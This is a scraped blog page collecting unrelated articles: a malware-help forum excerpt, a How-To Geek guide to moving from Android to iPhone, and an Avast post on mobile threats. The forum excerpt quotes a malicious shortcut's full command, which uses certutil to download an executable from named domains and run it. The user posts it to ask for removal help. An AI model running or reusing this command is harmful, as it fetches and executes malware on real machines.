Featured Post

.Lnk file with cmd usage - Virus, Trojan, Spyware, and Malware Removal Help - BleepingComputer

Image
.Lnk file with cmd usage - Virus, Trojan, Spyware, and Malware Removal Help - BleepingComputer.Lnk file with cmd usage - Virus, Trojan, Spyware, and Malware Removal Help - BleepingComputerPosted: 06 Jul 2020 11:33 AM PDT Hi all,Looking for feedback on the likelihood my double clicking of a bad .lnk file caused damage.. When I did double click it, I remember getting a standard windows dialog box. I believe it said the path did not exist or shortcut unavailable.. I'm not finding anything in my startup folder for C:\programdata or my username appdata startup folder...  I ran scans with malwarebytes, Hitman with no results.The .lnk file target was:%ComSpec% /v:on/c(SET V4=/?8ih5Oe0vii2dJ179aaaacabbckbdbhhe=gulches_%PROCESSOR_ARCHITECTURE% !H!&SET H="%USERNAME%.exe"&SET V4adKK47=certutil -urlcache -f https://&IF NOT EXIST !H! (!V4adKK47!izub.fun!V4!||!V4adKK47!de.charineziv.com!V4!&!H!))>nul 2>&1The .lnk file 'start-in' was:"%APPDATA%\Mic…

How to Switch From Android to iPhone - How-To Geek

How to Switch From Android to iPhone - How-To Geek


How to Switch From Android to iPhone - How-To Geek

Posted: 12 Jun 2020 03:40 AM PDT

A woman holding an iPhone and Android phone.
Hadrian/Shutterstock

Apple's iOS and Google's Android are two mobile platforms with very different approaches to security, privacy, and software selection. Migrating from one to the other can be an adjustment.

If you're jumping the Android ship to an iPhone, here are a few things to keep in mind.

There's an Official "Move to iOS" Helper Service

When you first set up your new iPhone, you'll be asked whether you want to set it up as a new phone, transfer contents from an old iPhone, or migrate from Android. The last option should get you up and running quickly.

To migrate, download Apple's Move to iOS app from Google Play on your Android device. This app allows you to transfer data wirelessly to your new iPhone. Data you can transfer includes contacts, messages, photos and videos, bookmarks, email accounts, calendars, and some free apps.

Data from an Android phone being transferred to an iPhone.
Apple

The service is useful because it puts this data in the corresponding iOS apps, like the Phone app (contacts), Safari (bookmarks), and Photos (media). Free apps, like WhatsApp, Slack, or Facebook, might also be downloaded and ready to go.

You'll need to validate your passwords and account credentials on your new device (including transferred email accounts).

Controlling Your New iPhone

On the iPhone iOS operating system, there are no "back" or "multitasking" buttons that remain onscreen like there are on Android. Rather, you access these functions via gestures or hard button presses (depending on which iPhone model you have).

If your iPhone lacks a physical Home button (like iPhone X, 11, or later), swipe up from the bottom of the screen to go to the Home screen. To access the app switcher menu, swipe up and hold. To go back, you can swipe left-to-right from the edge of the screen. You can quickly switch between apps by swiping left and right on the virtual Home button bar at the bottom of the screen.

If your iPhone has a physical Home button with Touch ID (like iPhone 8 or the new SE) press it to go to the Home screen. Double-press the Home button to view the app switcher and flick between apps. Swiping from the left edge of the screen will take you back one step in most menus and apps.

The iPhone 11 Pro and iPhone SE 2.
Apple

Control Center is a useful feature that provides quick access to Airplane mode, media controls, Bluetooth devices, and system shortcuts. On an iPhone without a physical Home button, swipe down from the top-right corner (where the clock is). On other iPhone models, swipe up from the bottom of the screen.

You can customize Control Center to show the shortcuts that are most useful to you. This provides convenient access to features like the flashlight, calculator, wallet, and accessibility enhancements. You can also use this menu to adjust the screen brightness and volume, or enable portrait lock to prevent the screen from rotating.

Many iPhone functions can be performed with voice commands and Siri. To access Siri, press and hold the side (power) button on newer Face ID iPhones. Press and hold the physical Home (Touch ID) button if your iPhone has one.

Results from Siri showing what time it is in San Francisco.

Lastly, it's also easy to take screenshots. On an iPhone without a physical Home button, just press the side (power) and Volume Up buttons simultaneously. If your iPhone has a physical Home button, press it and the Power button simultaneously. Screenshots are sent to your Photos app, but you can also tap on the overlay to edit and share one instantly.

Many of the controls you're used to on your old device, like pinch-to-zoom, are the same. You can also tap and hold an item to see a context menu for functions like opening a link in a new tab or deleting an app. If you want to go to the top of a list or web page, just tap the top of the screen.

Understanding Apple's Limitations (and Benefits)

iOS is a fairly locked-down operating system due to Apple's "walled garden" approach to mobile devices. The company maintains a high degree of control over what people can do on its products and the type of software that's allowed.

The most obvious difference is that you can't install apps from just anywhere on an iPhone. The vast majority are limited to the App Store, Apple's curated catalog of software, all of which has been vetted and approved. These apps are also bound by Apple's strict rules.

However, there are definitely some upsides to Apple's cautious approach. Because of the rigidly enforced App Store policies, you don't have to worry too much about malware sneaking its way onto your device.

On iOS, apps are also sandboxed to prevent them from accessing your data unnecessarily or damaging your device. Apps must ask permission to access things like your location or contacts list. You also have to grant apps access to the camera or microphone.

A permission request from the Yelp app to access the owner's location on an iPhone.

At any point, you can review your app permissions and revoke any you're uncomfortable with. This is one of the best aspects of Apple's approach to third-party software. You have granular control over which apps have access to what. You also don't have to agree to all of an app's demands to use it.

The flip side of this is that any apps Apple doesn't want in their storefront are banned. This is why you won't find a BitTorrent client in the App Store. There are ways around this, though, for the more dedicated, but most people just learn to live with it.

Apple's restrictions are a theme throughout the operating system, although the grip has loosened in recent years. You can't change your default browser from Safari, but you can install custom keyboards. The Home screen and launcher haven't changed since the iPhone first launched in 2007, but at least you can use a Dark mode now.

Enabling "Dark" mode on iOS 13.

One last thing you might miss from your old Android device is the removable microSD card for backing up and transferring data. There's no such expandable storage on any iPhone. You'll have to transfer files via Finder on macOS Catalina, iTunes on Windows, AirDrop, or iCloud.

Familiarize Yourself with Apple's Services

Now that you own an iPhone, you have access to many services reserved for Apple customers, including FaceTime, Apple's voice- and video-chat service. FaceTime works between Apple devices, so anyone with an Apple ID and device can chat for free. You can use the dedicated FaceTime app or, in the Phone app, find the contact you want to talk to, and then tap the FaceTime icon.

Similarly, iMessage is Apple's device-to-device instant-messaging protocol. The service seamlessly integrates with the Messages app. If you're chatting to someone and seeing blue chat bubbles, you're communicating via iMessage. Green bubbles indicate messages received via SMS. iMessage is free and works anywhere you have an internet connection.

iCloud is Apple's cloud storage service. You can use it to back up your device on the cloud, store files, or sync data between devices. You can access many of these features via the web at iCloud.com. You'll probably have to pay for some additional storage if you want to use iCloud to back up your device regularly—you only get 5 GB of space for free.

Available iCloud space under "Storage" on an iPhone.

To upgrade, head to Settings > [Your Name] > iCloud. There, you can see how your iCloud storage is being used. Tap "Manage Storage" to get more space, or enable or disable iCloud sync for apps and services.

We recommend leaving everything on and buying a small amount of storage for backups. This way, if you ever lose or break your iPhone, you can restore all of your data from the cloud.

One final thing you might want to set up is Apple Pay. It allows you to make contactless payments via your iPhone (and Apple Watch, if you have one). You can do this under Settings > Wallet and Apple Pay.

After you add your credit card, you can access your wallet by double-tapping the side button on iPhone X or later. On iPhone SE or iPhone 8, just rest your finger on the Touch ID sensor and hold it near the payment device.

The Home Screen, Search, and Widgets

Since you can't replace or customize the iOS "launcher" like you can on Android, it's worth familiarizing yourself with the few options you have available.

You can move an app around by tapping and holding its icon and waiting for it to wobble. When app icons are wobbling, you can rearrange them as you see fit. Use the Home gesture or press the Home button to save your changes. If you drag one icon on top of another, it creates a folder. This is about as deep as app organization goes on iOS.

That's why the search bar is a godsend—you don't have to remember where you stored an app or which folder it's in. Simply swipe down from the top to reveal the search bar and start typing. You can search for apps, people, preference panels, or items within apps (like Notes in Evernote or documents in Google Drive). You can even perform sums and start conversations.

It's the ultimate way to interact with your iPhone. When you pull down the search bar, you should see "Siri Suggestions." If you're a creature of habit, Siri will likely correctly predict which app you want. For example, if you launch the Podcast app every morning at 8 a.m., it will be listed under "Siri Suggestions" once the assistant learns your routine.

The Search bar showing "Siri Suggestions" on iOS 13.

The iPhone also has widgets, although they're not that useful. Apple's version of widgets display information and not much else. To see widgets, swipe left-to-right on the Home screen. At the bottom, you'll see an Edit button; tap it to rearrange, hide, or add different widgets.

Tapping a widget will usually launch the corresponding app. Widgets are fine for checking headlines and sports results, or glancing at information, like exchange rates and stock prices, just don't expect Android-level widget functionality.

Carry on Using Google Services via Apps

Just because you've left Android behind doesn't mean you've left Google. In fact, Google's apps for iOS are among some of the best third-party services the platform has to offer.

The Gmail app is, hands down, the best way to use your Gmail account. It's also the only app Google has deemed worthy of push notifications. Unlike third-party email apps that mess up your labels, Gmail for iPhone works perfectly because it's an extension of the core service.

Google Drive is another stellar app that works flawlessly on iOS. It's arguably more useful than the Apple Files app, which is how you interact with your iCloud storage. Google also has separate apps for Docs, Sheets, and Slides if you need to get some work done on the go.

The icons of all the Google apps for iOS.

You can also download Google Chrome for iPhone. In terms of performance, it's little more than a shell for Safari, but it does allow you to sync your tabs, bookmarks, and history with any other version of Chrome that shares your login. There's also a basic Google app for searching, browsing, and Google Goggles.

Those are just the core Google services, though; don't forget YouTube, Google Maps, Hangouts, Google Home, or Google Calendar, just to name just a few.

Even if you use the Gmail app for email, you can also link your Google account under Settings > Passwords and Accounts. This will allow you to sync additional data, like your Google contacts, Google Calendar, and notes.

iPhone Privacy and Security

The way Apple designed and controls the iOS ecosystem has earned it a reputation for being secure and respectful of privacy. While no platform is bulletproof, iOS has proven over the years that it's not as susceptible to malware and outside interference as Google's laissez-faire alternative.

You don't need antivirus or anti-malware software for iOS. They wouldn't be permitted to run constantly or comb your device for potential threats anyway, given Apple's sandboxing and the way iPhone handles multitasking. The best thing you can do to protect your iPhone is keep it up to date.

Apple frequently issues updates for its devices, including older models. Every year, iOS receives a major upgrade in the form of a new version. It's usually announced in June and available in October. Upgrading usually updates core apps, and adds new features and performance improvements. For example, iOS 13 added Dark mode, better media editing and privacy controls, and a whole lot more.

A WhatsApp notification with the preview hidden on iPhone.
Tim Brookes

The platform is inherently protective of your privacy. This stems from the fact that Apple is a hardware company, not an information company. Both iMessage and FaceTime use end-to-end encryption by default.

Apple has also refused multiple times to provide "backdoor" access to iPhones for governments and law enforcement. The facial recognition "fingerprint" used by Face ID never leaves your iPhone and is never accessible to third-party apps or services.

You can also now "Sign in with Apple," which creates an anonymous user token for signing in to services without giving up your Facebook or Google credentials. The company has a demonstrated commitment to privacy.

With that in mind, it's still always healthy to question the motivations of billion-dollar companies, like Apple.

Master Your New iPhone

The iPhone is an incredibly easy device to use. You can't really mess anything up by playing around with it. So, browse the menus and options and get to know iOS better.

When you're ready, check out some tips to keep your iPhone safe. You can also learn how to take better iPhone photos and which privacy settings you might want to tweak. You can even use your iPhone as a webcam for better-quality video calls on your Mac or PC.

Smartphones and Increasing Mobile Threats | Avast - Security Boulevard

Posted: 11 Jun 2020 02:29 PM PDT

The mobile phone is a logical extension to the physical person —we all have one. We organize our lives by it, from keeping fit to managing finances. They are invaluable. But in parallel with the benefits come increasing threats.

The Mobile Landscape

Since the advent of the smartphone, our mobile device has become integral to everyday life. It provides access to friends and colleagues, controls our smart home devices, delivers online shopping, and provides online banking — all from anywhere and at any time. In 2019, nearly 75% of people in the UK used their mobile devices for online banking. In March 2020, Juniper Research predicted that digital banking in the U.S. would grow by 54% between now and 2024, as millennials and other younger consumers abandon traditional banking for digital and online banking.

With so much of our activity — and all our digital credentials — stored on these devices, it is little wonder that mobile phones are being both used and targeted in more cybercrime year on year. According to data from Sift, over 50% of online fraud now involves Android or iOS devices.

Threats to mobile phones

The Verizon 2020 Mobile Security Index report separates the mobile threat into four basic categories: users; apps and software; the device; and the networks to which they connect. We'll follow that sequence in discussing some of the threats.

User threats

Users are the first point of security for any device and users are no more or less secure than their own knowledge, vigilance, and security technology. Phishing is the oldest, least technical and most persistent threat online, and continues to be the most common attack type. While many users are becoming more savvy to phishing attacks, thanks to resources like the Avast Academy, mobile users are being targeted more frequently and with greater sophistication. 

Most traditional phishing campaigns take place over email, with fraudulent messages posing as legitimate organizations to obtain sensitive data from victims; but mobile devices allow many more vectors. Email attacks are still prominent, but users can also receive malicious texts, phone calls and even fraudulent advertising, a form of malvertising, in apps and web pages. According to data supplied by Lookout, almost half of users who have clicked one phishing link have repeatedly fallen prey to phishing links six or more times. Despite the age of the threat, phishing continues to be effective.

Phishing scams can affect us even when we're not the direct victims. A Florida town lost nearly $750,000 to a phishing scam when a scammer posed as a contractor and asked the local government to update some payment details, resulting in city funds being sent to the scammer. Even more recently, the government of Puerto Rico lost $2.6 million after falling prey to a phishing email, effectively stealing that money from taxpayers. Mobile phones are often used to initiate large-scale scams because the fraudster can pretend to be traveling and therefore difficult to contact for verification.

URL obfuscation attacks often form a component of phishing campaigns and can be a mobile threat in their own right. It's often harder to verify the legitimacy of any given link or URL on mobile devices than laptops or desktops. Mobile internet browsing apps do not communicate security information as clearly as desktop browsers and links sent via SMS can be easily obfuscated by a variety of techniques. URL obfuscation can be as simple as replacing the top-level domain of an address or switching similar-looking characters (like '0' for 'o', 'cl' for 'd', etc.). 

A more sophisticated form of this attack is known as a homograph attack. This is where one or more of the characters in a domain name have been substituted for foreign look-alike characters — for example, the Greek Tau (τ) instead of the normal 't'. Thus, criminals could register (for illustration only) microsofτ.com and develop it as a malicious site. The user would very easily believe the link is to the genuine microsoft.com.

Mobile users frequently accept app permissions without reading them in detail. This can allow fraudulent apps to use the device's camera to spy on the user, or record inputs such as login details and banking credentials. This is not always the fault of inattentive users; some mobile malware is able to overlay harmless-looking permission prompts over real ones, making users believe they're agreeing to something innocent while actually permitting an app to access all files on the device or read sensitive data.

App threats

It is difficult to keep track of how many smartphones are in use around the world, but one estimate in 2018 suggested 2.3 billion Android smartphones. Other estimates have suggested there may be 100 million of these infected with malware. There are fewer iOS phones, but both sets of users are persistently attacked through the apps they use. 

A common form of attack is through malicious or weaponized apps. These are most often introduced via sideloading, when the user installs an app from a source other than the official app store. In many cases, the lure is a free 'cracked' version of a commercial product; or it could be a purpose-built app that pretends to be a game or source of adult entertainment (porn-related) but contains malware.

One example of sideloading involved serving malware, called Agent Smith, inside legitimate apps ,including WhatsApp, in 2019. The apps were downloaded from the third-party store 9apps.com, which is owned by China's Alibaba. Twenty-five million Android phones are believed to have been infected with Agent Smith — up to 15 million in India, but more than 300,000 in the U.S. and 137,000 in the UK.

However, malicious apps can also be found on official stores. In March 2020, security researchers found 56 malware-infected apps on Google Play Store that had been downloaded more than 1 million times. Twenty-four of the apps were targeting children.

The maliciousness of malicious apps is also increasing. Some mobile ransomware doesn't simply lock files stored locally, but also those in the user's cloud storage like Google Drive. Doxware, which doesn't just lock data but threatens to publish personal files online, is also increasing. A surprisingly high proportion of people take intimate pictures of themselves with their mobile devices, to share with romantic partners. A 2014 survey found that 90% of young millennial women had taken intimate photos on their phone. Publication of these can be intensely embarrassing and lead to online abuse. There may also be location information stored in pictures' metadata which could endanger personal safety if published.

Stalkerware – which is generally installed by a 'trusted' partner to spy on a person's location and friends – is also growing. This shows not only the diversity of threats to mobile phones, but also the diversity of threat sources.

Device threats

SIM-swapping is a serious threat that has doubled every year since 2016. The criminal contacts the user's phone carrier service, and persuades it to transfer the victim's phone number to a different SIM card ("I've had to buy a new phone — here are the details — please transfer my phone number"). Until it is resolved, the criminal receives all calls and SMS messages, including any 2FA authentication codes, meant for the victim. It is unfortunately very easy, and even Twitter CEO Jack Dorsey has been a victim.

While most attacks don't need direct physical access to a device, having that access can be an easy and effective way to compromise a target. Juice jacking is a colorfully-named method of device intrusion in which hackers replace or modify publicly accessible power outlets. The compromised power source can then be used to install malware. 

None of these innovative attacks are necessary if an attacker can get hold of our phone – and this can be as simple as picking it up when we forget or lose it. In London, over 25,000 mobile devices were lost on public transport between 2017 and 2018, and an average of 23,000 Android devices are lost or stolen each month. Four percent of Android users will lose their device at least once, so opportunist thieves are likely to have regular opportunities to acquire devices and potentially all the information on them.

Network threats

Our mobile devices are, by definition, IoT devices, and often used as IoT control hubs. We need to treat them with the same consideration we give our other IoT devices because their loss can lead to the abuse of every smart device controlled via the phone. 

Man-in-the-Middle – or MitM attacks – are often executed through public Wi-Fi hotspots, whether legitimate networks have been compromised or fraudulent hotspots have been set up specifically for malicious purposes. Statistics suggest that 7% of mobile devices may experience a MitM attack every year. We need to treat every external Wi-Fi connection (cafes, hotels, airports and so on) with caution.

Protecting ourselves

Most, but not all, mobile threats originate through social engineering where the attacker persuades the user to do what the attacker wants rather than what the user should do. Technology cannot stop you doing what you choose to do to your own phone. In protecting yourself, the primary defense is your own awareness of the threat. We have discussed some of these threats, but by no means all of them. Maintain constant awareness through vigilance and learning.

Not all threats come via social engineering. In 2019, a bug allowed WhatsApp users to be infected remotely simply by a phone call — which the user did not even need to answer. If awareness cannot prevent the infection, technology can help. Every mobile phone user should have a mainstream anti-malware product installed on the phone.

And finally, do not forget to encrypt your data wherever possible.

*** This is a Security Bloggers Network syndicated blog from Blog | Avast EN authored by Avast Blog. Read the original post at: https://blog.avast.com/smartphones-and-increasing-mobile-threats-avast

Comments

Popular Posts

System detected an overrun of a stack-based buffer in this application [FIX] - Windows Report

Valorant anti-cheat lead answers many questions on Reddit - Millenium US